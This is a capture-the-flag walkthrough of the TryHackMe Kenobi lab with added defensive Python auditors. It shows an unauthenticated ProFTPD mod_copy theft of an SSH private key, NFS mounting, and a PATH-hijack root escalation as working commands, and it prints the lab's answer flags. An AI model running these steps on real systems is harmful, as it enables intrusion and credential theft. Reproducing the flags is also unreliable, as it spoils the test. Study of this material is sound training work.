TryHackMe - Kenobi - Writeup
Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.
NMAP Scan
root@ip-10-10-207-9:~# nmap -sC -sV -A 10.10.207.215
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:23 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00078s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 49912/udp mountd
| 100005 1,2,3 58881/tcp mountd
| 100021 1,3,4 36376/udp nlockmgr
| 100021 1,3,4 39717/tcp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 02:1C:33:5D:1A:83 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2021-05-06T13:24:10-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-06 19:24:10
|_ start_date: 1600-12-31 23:58:45
TRACEROUTE
HOP RTT ADDRESS
1 0.78 ms ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.12 seconds
Enumerating Samba for shares
root@ip-10-10-207-9:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.207.215
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:39 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00022s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 02:1C:33:5D:1A:83 (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.207.215\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.207.215\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.207.215\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds
Using the nmap command above, how many shares have been found?
Answer: 3
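The three shares are easy to count by eye here, but the finding worth recording is which of them an unauthenticated user can read or write. The following Python, added here and not part of the original writeup, parses the smb-enum-shares output above (pasted in as the sample string) and separates the always-present IPC$ pipe share from a disk share backed by a user's home directory that allows anonymous READ/WRITE. The field names are exactly those nmap prints; nothing else is assumed.

```python
import re

# Sample input: the smb-enum-shares section of the nmap output above, pasted in
# as a raw string (the leading "| " / "|_ " is nmap's script-output prefix).
SAMPLE_NMAP = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.207.215\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.207.215\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.207.215\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
"""

# A share header looks like "\\host\name:" once the nmap prefix is stripped.
SHARE_RE = re.compile(r"^\\\\[^\\]+\\(?P<name>[^:]+):$")


def parse_smb_shares(text):
    """Turn nmap smb-enum-shares output into {share_name: {field: value}}."""
    shares = {}
    current = None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").rstrip()
        match = SHARE_RE.match(line)
        if match:
            current = match.group("name")
            shares[current] = {}
            continue
        if current is None or ":" not in line:
            continue
        key, _, value = line.partition(":")
        shares[current][key.strip()] = value.strip()
    return shares


def anonymous_writable(shares):
    """Names of every share nmap reports as writable without credentials."""
    return sorted(name for name, fields in shares.items()
                  if "WRITE" in fields.get("Anonymous access", ""))


def risky_disk_shares(shares):
    """Disk shares reachable anonymously, as (name, path, access).

    IPC$ is reachable on any Samba host, so it is not a finding by itself; a
    disk-tree share under a user's home directory with anonymous access is.
    """
    return [(name, fields.get("Path", ""), fields["Anonymous access"])
            for name, fields in shares.items()
            if fields.get("Type") == "STYPE_DISKTREE"
            and fields.get("Anonymous access", "<none>") != "<none>"]


if __name__ == "__main__":
    shares = parse_smb_shares(SAMPLE_NMAP)
    print(f"{len(shares)} shares found: {', '.join(shares)}")
    print("anonymous write:", anonymous_writable(shares))
    for name, path, access in risky_disk_shares(shares):
        print(f"  [!] {name} -> {path} ({access})")
```

On the sample this reports three shares, two of them anonymously writable, and a single disk share (`anonymous`, backed by `/home/kenobi/share`) as the real exposure. On the server side that behaviour comes from the share being marked guest-accessible in smb.conf; restricting it to authenticated users removes the foothold used in the next step.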
root@ip-10-10-207-9:~# smbclient //10.10.207.215/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 11:49:09 2019
.. D 0 Wed Sep 4 11:56:07 2019
log.txt N 12237 Wed Sep 4 11:49:09 2019
9204224 blocks of size 1024. 6703228 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (2987.5 KiloBytes/sec) (average 2987.5 KiloBytes/sec)
smb: \>
Once you're connected, list the files on the share. What file can you see?
Answer: log.txt
What port is FTP running on?
Answer: 21
root@ip-10-10-207-9:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.207.215
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:51 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00022s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 2010404.0 6703224.0 24% 16.0T 32000
MAC Address: 02:1C:33:5D:1A:83 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
What mount can we see?
Answer: /var
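The showmount line `/var *` is the whole story of the later mount step: the export accepts any client. The Python below, added here as an illustration and not taken from the writeup or the target, parses /etc/exports-style lines and flags the settings that matter. The sample file is constructed; only the `/var` path and the `*` client come from the scan above, and the option list is an assumption chosen to show every check firing. Note that root_squash would not have changed the outcome on this box, because the key copy shown later is owned by `ubuntu` and world-readable; the client wildcard is the decisive setting.

```python
# Sample input: a constructed /etc/exports in the style that produces the
# "/var *" line showmount printed above. The option list is an assumption
# for illustration; only the path and the "*" client come from the scan.
SAMPLE_EXPORTS = """\
# constructed sample, not the target's real file
/var *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/data 10.0.0.0/24(ro,sync,root_squash,no_subtree_check)
"""


def parse_exports(text):
    """Parse /etc/exports lines into (path, client, {options}) tuples."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        # exportfs treats a path with no client spec as exported to everyone
        path, clients = parts[0], parts[1:] or ["*"]
        for spec in clients:
            client, _, opts = spec.partition("(")
            options = {o for o in opts.rstrip(")").split(",") if o}
            exports.append((path, client, options))
    return exports


def export_findings(exports):
    """Flag the settings that let an arbitrary client read or write an export."""
    findings = []
    for path, client, options in exports:
        if client in ("*", "0.0.0.0/0"):
            findings.append((path, client, "any host may mount this export"))
        if "rw" in options:
            findings.append((path, client, "rw: clients can modify files"))
        if "no_root_squash" in options:
            findings.append((path, client, "no_root_squash: client root keeps uid 0"))
        if "insecure" in options:
            findings.append((path, client,
                             "insecure: mounts accepted from unprivileged source ports"))
    return findings


if __name__ == "__main__":
    for path, client, why in export_findings(parse_exports(SAMPLE_EXPORTS)):
        print(f"[!] {path} -> {client}: {why}")
```

The second sample line (a read-only export limited to one subnet with root_squash) produces no findings, which is the shape an export of a system directory should have if it must exist at all; exporting /var itself, which holds logs, spool and temp files, is rarely justified.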
Gain initial access with ProFtpd
What is the version?
Answer: 1.3.5
root@ip-10-10-207-9:~# searchsploit proftpd 1.3.5
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
---------------------------------------------- ---------------------------------
How many exploits are there for the ProFTPd running?
Answer: 3
root@ip-10-10-207-9:~# nc 10.10.207.215 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.207.215]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
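What the nc session above shows is the mod_copy defect in one exchange: the server accepted SITE CPFR and SITE CPTO with no USER/PASS beforehand, and it copied a private key into a directory that the NFS export makes readable to everyone. The following Python, added here and not part of the original writeup, audits a control-channel transcript for exactly that pattern. It assumes the commands are available as text lines, for example from a packet capture or from ProFTPD's ExtendedLog; the benign second session and the lists of sensitive sources and shared destinations are constructed assumptions.

```python
import re

# Sample input: the control-channel exchange from the nc session above,
# followed by a constructed benign session (login, then a copy inside /pub)
# that the audit must not flag. Lines starting with a 3-digit code are
# server replies; everything else is a client command.
SAMPLE_SESSION = """\
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.207.215]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
"""

BENIGN_SESSION = """\
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.207.215]
USER alice
331 Password required for alice
PASS not-a-real-password
230 User alice logged in
SITE CPFR /pub/report.txt
350 File or directory exists, ready for destination name
SITE CPTO /pub/report-copy.txt
250 Copy successful
"""

REPLY_RE = re.compile(r"^\d{3}[ -]")
# Source paths that no ordinary FTP user has a reason to copy (assumed list).
SENSITIVE_SOURCES = [
    re.compile(r"^/home/[^/]+/\.ssh/"),
    re.compile(r"^/root/"),
    re.compile(r"^/etc/(shadow|gshadow|sudoers)$"),
]
# Destinations that other users, NFS clients or the web server can read.
SHARED_DESTINATIONS = ("/tmp/", "/var/tmp/", "/var/www/")


def audit_ftp_session(lines):
    """Return (source, destination, [reasons]) for each suspicious CPFR/CPTO pair.

    A pair is suspicious when it is issued before a 230 login reply (copies
    honoured without authentication), when the source is a key or credential
    file, or when the destination is a directory others can read.
    """
    findings = []
    authenticated = False
    pending_source = None
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if REPLY_RE.match(line):
            if line.startswith("230"):
                authenticated = True
            continue
        parts = line.split(maxsplit=2)
        if parts[0].upper() != "SITE" or len(parts) < 3:
            continue
        subcommand, argument = parts[1].upper(), parts[2]
        if subcommand == "CPFR":
            pending_source = argument
        elif subcommand == "CPTO" and pending_source is not None:
            reasons = []
            if not authenticated:
                reasons.append("copy issued before any successful login")
            if any(p.match(pending_source) for p in SENSITIVE_SOURCES):
                reasons.append("source is a private key or credential file")
            if argument.startswith(SHARED_DESTINATIONS):
                reasons.append("destination is a directory other users can read")
            if reasons:
                findings.append((pending_source, argument, reasons))
            pending_source = None
    return findings


if __name__ == "__main__":
    for src, dst, reasons in audit_ftp_session(SAMPLE_SESSION.splitlines()):
        print(f"[!] {src} -> {dst}: {'; '.join(reasons)}")
```

On the captured exchange all three reasons fire for the single copy; the benign session produces nothing. Detection is the fallback, though: the fix is a ProFTPD release where mod_copy requires a login, or not loading mod_copy at all. The mod_copy documentation also shows a `<Limit SITE_CPFR SITE_CPTO>` block with `DenyAll` for refusing the commands outright.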
root@ip-10-10-207-9:~# mkdir /mnt/kenobiNFS
root@ip-10-10-207-9:~# mount 10.10.207.215:/var /mnt/kenobiNFS
root@ip-10-10-207-9:~# ls -la /mnt/kenobiNFS
root@ip-10-10-207-9:~# ls -la /mnt/kenobiNFS/tmp
total 28
drwxrwxrwt 6 root root 4096 May 6 20:15 .
drwxr-xr-x 14 root root 4096 Sep 4 2019 ..
-rw-r--r-- 1 ubuntu ubuntu 1675 May 6 20:15 id_rsa
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 May 6 19:19 systemd-private-25feb6d12a1b4df9a4d0e2993544b880-systemd-timesyncd.service-cxdFHd
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
root@ip-10-10-207-9:~# cp /mnt/kenobiNFS/tmp/id_rsa ~
root@ip-10-10-207-9:~# ssh -i id_rsa kenobi@10.10.207.215
The authenticity of host '10.10.207.215 (10.10.207.215)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.207.215' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899
What is Kenobi’s user flag (/home/kenobi/user.txt)?
Answer: d0b0f3f53b6caa532a83915e19224899
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
What file looks particularly out of the ordinary?
Answer: /usr/bin/menu
Run the binary, how many options appear?
Answer: 3
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# cd /root
# ls
root.txt
# cat root.txt
177b3cd8562289f37382721c28381f02
#
What is the root flag (/root/root.txt)?
Answer: 177b3cd8562289f37382721c28381f02
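The escalation worked because the SUID menu binary ran `curl` by bare name and trusted the PATH it inherited, so the copy the user placed in /tmp was found first. The Python below is an added illustration of that lookup, written for this page and not taken from the menu binary or the writeup; it builds a throwaway scenario (a trusted bin directory and a /tmp-like world-writable directory, both holding a file named `curl`, all constructed under a temp directory) and shows how the same bare name resolves under the inherited PATH versus a fixed one, plus a check for PATH entries any local user can write to.

```python
import os
import shutil
import stat
import tempfile

# PATH a privileged helper should set for itself instead of trusting the caller's.
TRUSTED_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def writable_path_entries(path):
    """PATH directories where any local user may create files (world-writable)."""
    risky = []
    for directory in path.split(":"):
        if (directory and os.path.isdir(directory)
                and os.stat(directory).st_mode & stat.S_IWOTH):
            risky.append(directory)
    return risky


def resolve(command, path):
    """Which file would run for a bare command name under this PATH."""
    return shutil.which(command, path=path)


def build_scenario():
    """Constructed stand-in for the box: a trusted bin dir and a /tmp-like
    world-writable dir, each holding an executable called 'curl'."""
    base = tempfile.mkdtemp(prefix="path-demo-")
    trusted = os.path.join(base, "usr_bin")
    scratch = os.path.join(base, "tmp")
    os.makedirs(trusted)
    os.makedirs(scratch)
    os.chmod(trusted, 0o755)           # root-owned, not writable by others
    os.chmod(scratch, 0o1777)          # sticky + world-writable, like /tmp
    for directory in (trusted, scratch):
        fake = os.path.join(directory, "curl")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")   # placeholder, never executed here
        os.chmod(fake, 0o755)
    return trusted, scratch


def demo():
    trusted, scratch = build_scenario()
    inherited_path = f"{scratch}:{trusted}"   # shape of `export PATH=/tmp:$PATH`
    return {
        "trusted_dir": trusted,
        "scratch_dir": scratch,
        "inherited_resolves_to": resolve("curl", inherited_path),
        "fixed_resolves_to": resolve("curl", trusted),
        "writable_entries": writable_path_entries(inherited_path),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two `resolves_to` values differ only because of the PATH handed to the lookup, which is the entire mechanism of the escalation. A privileged program avoids it by invoking helpers through absolute paths (`/usr/bin/curl`) or by resetting PATH to a fixed value before any `system()`-style call; on the auditing side, an unexpected SUID file such as `/usr/bin/menu` that is not owned by any package is the thing the `find -perm -u=s` listing above should draw attention to.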
Thanks for reading.
Written on May 18, 2021